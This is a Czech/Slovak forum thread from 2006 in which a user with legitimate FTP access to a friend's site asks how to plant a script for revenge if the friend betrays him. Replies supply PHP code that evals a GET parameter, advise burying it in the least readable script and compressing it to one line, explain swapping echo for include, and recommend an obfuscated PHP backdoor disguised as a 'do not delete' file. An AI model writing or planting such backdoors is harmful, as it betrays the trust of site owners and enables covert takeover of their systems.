| cawte, mam pristup(oficialne) na jeden web, konkretne na ftp, robim kamosovi forum, slubil mi zato ze ma necha adminom, ale chcem si spravit poistku, ze keby ma zradil, porusil dohodou, tak mu na stranku hodim nejaky script, pomocou ktoreho by som sa mu potom mohol pomstit, poradite mi nieco???
(odpovědět) | |
|
|
| Kamkoliv doprostred toho nejneprehlednejsiho scriptu hod eval() funkci, ktera bude vykonavat prikazy zadany v GET promenny (pres URL).
(odpovědět) | Emkei |  |  |  | 6.11.2006 17:09 |
|
|
|
| heh, ja velmi php neovladam, nemohol by si mi to napisat? aspon zaklad
(odpovědět) | |
|
|
| if (isset($_GET["foo"])) {
$foo = get_magic_quotes_gpc()?
stripslashes($_GET["foo"]):
$_GET["foo"];
eval($foo);
}
(odpovědět) | | Emkei | | | | 6.11.2006 18:58 |
|
|
|
| Když si budeš dávat majzla na to co tam píšeš, tak můžeš vypustit 2. a 3. řádek. ( To bys měl sice vědět, ale pro doplnění: vstup do skriptu by měl bejt ve stylu index.php?foo=echo'ahoj' ). Možná lepší bude když to namatláš do jednoho řádku, to se pak hůř čte.
(odpovědět) | Člověk | | |  333-851-717 | 6.11.2006 19:23 |
|
|
|
| nebo tam hos php_backdoor a pak jen muzes ovladat jeho stranky i forum jak se ti zliby, myslim zde n soomu neco takovyho kdysi bylo, mozna emkei bude vedet
(odpovědět) | |
|
|
| no akoze, to vobec nemusi byt nenapadne, totizto ten co mu robim forum vobec php neovlada, a taketo veci kontrolovat nebude
(odpovědět) | |
|
|
| to Antiy: no aj to by mohlo byt, skusim pozret ci tu nieco take je
(odpovědět) | |
|
|
| len este otazka, to echo mi ide, ale da sa cez to spravit aj include? ak hej ako?
(odpovědět) | |
|
|
| ako asi, ty pako :) misto echo dej include
(odpovědět) | | kve | 82.208.44.* | 6.11.2006 23:40 |
|
|
|
| no tak nasiel som php backdoor, daju sa s tym uploadovat subory a da sa prihlasit do databazy, takze zatial aspon takto
(odpovědět) | |
|
|
| kde si ho nasiel? Ja som toho uz prezrel dost a nic...
(odpovědět) | | pwnage | 87.197.40.* | 7.11.2006 17:44 |
|
|
|
| pwnage: Si nějakej udělej. Jsem si udělal lepší. :) Na netu vim jen o jednom co se da sehnat. Je od curliboie a ke stažení je protože nasral několik lidí od wz a jeden z nich ho uveřejnil. :) Docela slušnej. Zašifrovanej v php, aby nebyl tolik nápadnej... spouští se se speciální konfigurací URL, jinak hodí anglickou hlášku ve stylu: "Minimální soubor, nemazat!!" :)
(odpovědět) | | .Orin. - ZASE SE NEBUDU LOGOVAT | 82.100.62.* | 7.11.2006 17:51 |
|
|
|
| to pwnage: no tak pozri, neviem ci ti to bude stacit, vie: uploadovat subory, mozes si prezret obash danej zlozky, a pridat prikaz do mysql databazy, ak vies meno a heslo. je tu [link]
(odpovědět) | |
|
|
| sry, ten link nejdem aspon mne, napis mi na mail, ja ti poslem zdrojak
(odpovědět) | |
|
|
